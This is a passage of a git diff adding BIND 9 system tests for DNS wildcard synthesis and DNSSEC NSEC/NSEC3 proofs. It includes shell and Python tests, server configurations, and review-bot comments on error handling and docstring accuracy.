+infile=private.nsec3.db.in +zonefile=private.nsec3.db +outfile=private.nsec3.db.signed + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -3 - -H 10 -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +keyfile_to_static_ds $keyname2 > private.nsec3.conf + +zone=. +infile=root.db.in +zonefile=root.db +outfile=root.db.signed + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key $dssets >$zonefile + +$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +keyfile_to_static_ds $keyname2 > trusted.conf diff --git a/bin/tests/system/wildcard/ns2/named.conf.in b/bin/tests/system/wildcard/ns2/named.conf.in new file mode 100644 index 0000000..a9a2a70 --- /dev/null +++ b/bin/tests/system/wildcard/ns2/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation no; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; 
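Review bot: In wildcard/ns1/sign.sh each signing step ends in `|| cat signer.err`, which turns a failed `$SIGNER` run into a successful command. The script therefore goes on to print "signed $zone" and to write trust anchors for a zone that was not signed, even though wildcard/setup.sh runs it with `$SHELL -e`. All five invocations should propagate the failure, for example `$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || { cat signer.err; exit 1; }`. The `$KEYGEN` calls send stderr to `/dev/null`, so an empty `$keyname1` would surface only as a confusing `cat` error on `.key`; leaving stderr visible would make that diagnosable.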
diff --git a/bin/tests/system/wildcard/ns3/named.conf.in b/bin/tests/system/wildcard/ns3/named.conf.in new file mode 100644 index 0000000..0b958fa --- /dev/null +++ b/bin/tests/system/wildcard/ns3/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +include "../ns1/trusted.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/wildcard/ns4/named.conf.in b/bin/tests/system/wildcard/ns4/named.conf.in new file mode 100644 index 0000000..b125fa7 --- /dev/null +++ b/bin/tests/system/wildcard/ns4/named.conf.in 
@@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + forward only; + forwarders { 10.53.0.2; }; +}; + +include "../ns1/trusted.conf"; +include "../ns1/private.nsec.conf"; +include "../ns1/private.nsec3.conf"; diff --git a/bin/tests/system/wildcard/ns5/named.conf.in b/bin/tests/system/wildcard/ns5/named.conf.in new file mode 100644 index 0000000..1cd358d --- /dev/null +++ b/bin/tests/system/wildcard/ns5/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +include "../ns1/trusted.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; 
diff --git a/bin/tests/system/wildcard/setup.sh b/bin/tests/system/wildcard/setup.sh
new file mode 100644
index 0000000..3d20b48
--- /dev/null
+++ b/bin/tests/system/wildcard/setup.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+(cd ns1 && $SHELL -e sign.sh)
diff --git a/bin/tests/system/wildcard/tests.sh b/bin/tests/system/wildcard/tests.sh
new file mode 100644
index 0000000..f93150c
--- /dev/null
+++ b/bin/tests/system/wildcard/tests.sh
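Review bot: wildcard/setup.sh has no `set -e`, unlike views/setup.sh in the same commit, so a failing `copy_setports` is ignored and the servers would start from a missing or stale `named.conf`. Only the final `(cd ns1 && $SHELL -e sign.sh)` determines the exit status. Adding `set -e` after the licence header, before `SYSTEMTESTTOP=..`, makes the two setup scripts behave the same way.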
@@ -0,0 +1,272 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned auth ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec +norec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned non-validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns2.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned validating + CD ($n)" +ret=0 +$DIG $DIGOPTS +cd a b.wild.nsec @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep -i 
'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns5.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns5.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking that returned NSEC wildcard non-existence proof validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned private, validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'a\.wild\.private\.nsec\..*NSEC.*private\.nsec\..*NSEC' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that returned NSEC wildcard non-existence proof for private zone validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'a\.wild\.private\.nsec\..*NSEC.*private\.nsec\..*NSEC' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned auth ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 +norec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned 
non-validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns2.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned validating + CD ($n)" +ret=0 +$DIG $DIGOPTS +cd a b.wild.nsec3 @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns5.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns5.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that returned NSEC3 wildcard non-existence proof validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned private, validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 
'UDBSP4R8OUOT6HSO39VD8B5LMOSHRD5N\.private\.nsec3\..*NSEC3.*ASDRUIB7GO00OR92S5OUGI404LT27RNU' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that returned NSEC3 wildcard non-existence proof for private zone validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec3 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'UDBSP4R8OUOT6HSO39VD8B5LMOSHRD5N\.private\.nsec3\..*NSEC3.*ASDRUIB7GO00OR92S5OUGI404LT27RNU' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RFC 4592 responses ..." + +n=`expr $n + 1` +echo_i "checking RFC 4592: host3.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host3.example. MX IN > dig.out.ns1.test$n || ret=1 +grep '^host3.example..*IN.MX.10 host1.example.' dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host3.example. QTYPE=A, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host3.example. A IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: foo.bar.example. 
QTYPE=TXT, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 foo.bar.example TXT IN > dig.out.ns1.test$n || ret=1 +grep '^foo.bar.example..*IN.TXT."this is a wildcard"' dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host1.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host1.example MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host1.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host1.example MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: sub.*.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 "sub.*.example." MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: _telnet._tcp.host1.example. QTYPE=SRV, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 _telnet._tcp.host1.example. SRV IN > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host.subdel.example. 
QTYPE=A, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host.subdel.example A IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +grep "subdel.example..*IN.NS.ns.example.com." dig.out.ns1.test$n > /dev/null || ret=1 +grep "subdel.example..*IN.NS.ns.example.net." dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: ghost.*.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 "ghost.*.example" MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check wild card expansions by code point ($n)" +ret=0 +i=0 +while test $i -lt 256 +do + x=`expr 00$i : '.*\(...\)$'` + $DIG $DIGOPTS @10.53.0.1 "\\$x.example" TXT > dig.out.ns1.$x.test$n + if test $i -le 32 -o $i -ge 127 + then + grep '^\\'"$x"'\.example\..*TXT.*"this is a wildcard"$' dig.out.ns1.$x.test$n > /dev/null || { echo_i "code point $x failed" ; ret=1; } + # "=34 $=36 (=40 )=41 .=46 ;=59 \=92 @=64 + elif test $i -eq 34 -o $i -eq 36 -o $i -eq 40 -o $i -eq 41 -o \ + $i -eq 46 -o $i -eq 59 -o $i -eq 64 -o $i -eq 92 + then + case $i in + 34) a='"';; + 36) a='$';; + 40) a='(';; + 41) a=')';; + 46) a='\.';; + 59) a=';';; + 64) a='@';; + 92) a='\\';; + *) a=''; echo_i "code point $x failed" ; ret=1 ;; + esac + grep '^\\'"$a"'\.example.*.*TXT.*"this is a wildcard"$' dig.out.ns1.$x.test$n > /dev/null || { echo_i "code point $x failed" ; ret=1; } + else + grep '^\\' dig.out.ns1.$x.test$n && { echo_i "code point $x failed" ; ret=1; } + fi + i=`expr $i + 1` +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + 
+echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/wildcard/tests_wildcard.py b/bin/tests/system/wildcard/tests_wildcard.py new file mode 100755 index 0000000..66166f2 --- /dev/null +++ b/bin/tests/system/wildcard/tests_wildcard.py 
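Review bot: In the code-point loop at the end of the script, the `$DIG ... > dig.out.ns1.$x.test$n` call has no `|| ret=1`, unlike every other dig call in this file, and the final `else` branch only checks that no line starts with a backslash, so for the code points handled there a failed or empty query passes silently. I would write `$DIG $DIGOPTS @10.53.0.1 "\\$x.example" TXT > dig.out.ns1.$x.test$n || ret=1` and have the `else` branch also require the synthesized answer, e.g. `grep '"this is a wildcard"$' dig.out.ns1.$x.test$n > /dev/null || { echo_i "code point $x failed" ; ret=1; }`. The `grep '^\\'` in that branch is also the only grep in the script without `> /dev/null`. Separately, the `host1.example. QTYPE=MX` RFC 4592 check appears twice with an identical query and identical assertions; one copy can go unless a different case was intended.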
@@ -0,0 +1,112 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +""" +Example property-based test for wildcard synthesis. +Verifies that otherwise-empty zone with single wildcard record * A 192.0.2.1 +produces synthesized answers for <random_label>.test. A, and returns NODATA for +<random_label>.test. when rdtype is not A. + +Limitations - untested properties: + - expansion works with multiple labels + - asterisk in qname does not cause expansion + - empty non-terminals prevent expansion + - or more generally any existing node prevents expansion + - DNSSEC record inclusion + - possibly others, see RFC 4592 and company + - content of authority & additional sections + - flags beyond RCODE + - special behavior of rdtypes like CNAME +""" +import pytest + +pytest.importorskip("dns") +import dns.message +import dns.name +import dns.query +import dns.rcode +import dns.rdataclass +import dns.rdatatype +import dns.rrset + +pytest.importorskip("hypothesis") +from hypothesis import given +from hypothesis.strategies import binary, integers + + +# labels of a zone with * A 192.0.2.1 wildcard +WILDCARD_ZONE = ("allwild", "test", "") +WILDCARD_RDTYPE = dns.rdatatype.A +WILDCARD_RDATA = "192.0.2.1" +IPADDR = "10.53.0.1" +TIMEOUT = 5 # seconds, just a sanity check + + +# Helpers +def is_nonexpanding_rdtype(rdtype): + """skip meta types to avoid weird rcodes caused by AXFR etc.; RFC 6895""" + return not ( + rdtype == WILDCARD_RDTYPE + or dns.rdatatype.is_metatype(rdtype) # known metatypes: OPT ... 
+ or 128 <= rdtype <= 255 + ) # unknown meta types + + +def tcp_query(where, port, qname, qtype): + querymsg = dns.message.make_query(qname, qtype) + assert len(querymsg.question) == 1 + return querymsg, dns.query.tcp(querymsg, where, port=port, timeout=TIMEOUT) + + +def query(where, port, label, rdtype): + labels = (label,) + WILDCARD_ZONE + qname = dns.name.Name(labels) + return tcp_query(where, port, qname, rdtype) + + +# Tests +@given( + label=binary(min_size=1, max_size=63), + rdtype=integers(min_value=0, max_value=65535).filter(is_nonexpanding_rdtype), +) +def test_wildcard_rdtype_mismatch(label, rdtype, named_port): + """any label non-matching rdtype must result in to NODATA""" + check_answer_nodata(*query(IPADDR, named_port, label, rdtype)) + + +def check_answer_nodata(querymsg, answer): + assert querymsg.is_response(answer), str(answer) + assert answer.rcode() == dns.rcode.NOERROR, str(answer) + assert answer.answer == [], str(answer) + + +@given(label=binary(min_size=1, max_size=63)) +def test_wildcard_match(label, named_port): + """any label with maching rdtype must result in wildcard data in answer""" + check_answer_noerror(*query(IPADDR, named_port, label, WILDCARD_RDTYPE)) + + +def check_answer_noerror(querymsg, answer): + assert querymsg.is_response(answer), str(answer) + assert answer.rcode() == dns.rcode.NOERROR, str(answer) + assert len(querymsg.question) == 1, str(answer) + expected_answer = [ + dns.rrset.from_text( + querymsg.question[0].name, + 300, # TTL, ignored by dnspython comparison + dns.rdataclass.IN, + WILDCARD_RDTYPE, + WILDCARD_RDATA, + ) + ] + assert answer.answer == expected_answer, str(answer) diff --git a/bin/tests/system/win32/bigkey.vcxproj.filters.in b/bin/tests/system/win32/bigkey.vcxproj.filters.in new file mode 100644 index 0000000..1b592a6 --- /dev/null +++ b/bin/tests/system/win32/bigkey.vcxproj.filters.in 
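Review bot: The module docstring describes queries for `<random_label>.test.`, but `WILDCARD_ZONE = ("allwild", "test", "")` makes `query()` build `<label>.allwild.test.`, so the documented name does not match what is sent; the docstring should say `<random_label>.allwild.test.`. `tcp_query` and `query` have no docstrings; I would add `"""Send qname/qtype over TCP; return (query message, response)."""` and `"""Query <label>.allwild.test. for rdtype over TCP."""`. The two test docstrings also carry typos worth fixing while here: "result in to NODATA" and "maching rdtype".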
@@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\rsabigexponent\bigkey.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file
diff --git a/bin/tests/system/win32/bigkey.vcxproj.in b/bin/tests/system/win32/bigkey.vcxproj.in
new file mode 100644
index 0000000..7b4d59b
--- /dev/null
+++ b/bin/tests/system/win32/bigkey.vcxproj.in
@@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{61F9D673-EB5C-47A5-8907-24E034C75EF8}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>bigkey</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + 
